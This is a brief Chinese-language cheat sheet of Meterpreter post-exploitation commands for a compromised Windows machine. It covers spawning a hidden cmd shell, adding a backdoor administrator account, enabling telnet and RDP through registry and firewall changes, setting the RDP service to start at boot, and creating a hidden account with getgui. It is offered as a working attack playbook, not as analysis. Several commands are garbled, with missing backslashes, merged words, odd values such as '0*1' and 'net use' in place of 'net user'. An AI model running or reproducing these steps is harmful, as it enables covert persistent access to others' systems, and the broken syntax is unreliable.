1.获得meterpreter回话
2.execute -H -f cmd -i 执行时,创建一个交互命令shell(-i),该shell充当隐藏的进程(-H)。
3.创建用户 C: net use Service_Account password /add
C: net localgroup administrator Service_Accountt /add
4.开启telnet run gettelnet -e
启用远程Windows 终端服务
在交换式shell中修改注册表
C: reg add "hklmsystemcurrentControlSetControlTerminalServer" /v "AllowTSConnections" /t REG_DWORD /d 0*1 /f
C: reg add "hklmsystemcurrentControlSetControlTerminalServer" /v "fDenyTSConnections" /t REG_DWORD /d 0*0 /f
为了确保RDP协议能够通过客户端的防火墙。添加一条规则:
C: netshadvfirewall firewall set rule group =" remote desktop" new enable=Yes
开启RDP服务:
C: net start Terservice
这样启动没有持久性。开机自启:
C: sc configTermService start=auto
创建隐藏账户:
run getgui -u Service_Account -p pa$$word